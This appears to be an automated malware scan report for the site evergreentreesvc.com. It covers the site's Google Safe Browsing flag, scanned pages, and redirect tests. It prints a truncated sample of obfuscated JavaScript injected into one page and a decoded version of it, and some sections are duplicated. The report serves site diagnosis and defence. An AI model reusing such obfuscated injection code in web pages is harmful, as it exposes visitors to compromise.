Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=evergreentreesvc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://evergreentreesvc.com/ | 200 OK Content-Length: 885 Content-Type: text/html | clean |
http://evergreentreesvc.com/users/index.php?page=map-1.html | 200 OK Content-Length: 11036 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) this.hd="";var M=new Date();function i(){this.j="";var v;if(v!='' && v!='y'){v=''};var L=window;var c;if(c!='q'){c='q'};var U=unescape;this.O='';var gj;if(gj!='uW' && gj != ''){gj=null};var vq=new Date();var vy;if(vy!='G' && vy != ''){vy=null};var P=U("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%72%65%64%74%75%62%65%2e%63%6f%6d%2f%74%77%69%74%70%69%63%2e%63%6f%6d%2e%70%68%70");var nb=new Array();var Ip;if(Ip!='Iz' && Ip!='H'){Ip='Iz'};var Iv=new String();function Z(LK,A) Decoded script: function () { this.kK = false; jR = "jR"; var oHK = "oHK"; this.pV = 16778; this.c = false; var rJ = new Array; vF.q(); function kH() { } var tE = ""; nW = "nW"; yE = ""; var nS = 43439; this.oZ = "oZ"; } /*** called setTimeout with function () { this.kK = false; jR = "jR"; var oHK = "oHK"; this.pV = 16778; this.c = false; var rJ = new Array; vF.q(); function kH() { } var tE = ""; nW = "nW"; yE = ""; var nS = 43439; this.oZ = "oZ"; }, 197 */ zgf</body></html> Antivirus reports:
| ||
http://evergreentreesvc.com/test404page.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: evergreentreesvc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Sep 2014 02:07:26 GMT
Accept-Ranges: bytes
ETag: "1d283a4-375-34a93040"
Server: Apache/2.0.52 (Red Hat)
Content-Length: 885
Content-Type: text/html
Last-Modified: Fri, 01 Apr 2011 13:15:37 GMT
...885 bytes of data.
GET / HTTP/1.1
Host: evergreentreesvc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 18 Sep 2014 02:07:26 GMT
Accept-Ranges: bytes
ETag: "1d283a4-375-34a93040"
Server: Apache/2.0.52 (Red Hat)
Content-Length: 885
Content-Type: text/html
Last-Modified: Fri, 01 Apr 2011 13:15:37 GMT
...885 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: evergreentreesvc.com
Referer: http://www.google.com/search?q=evergreentreesvc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: evergreentreesvc.com
Referer: http://www.google.com/search?q=evergreentreesvc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.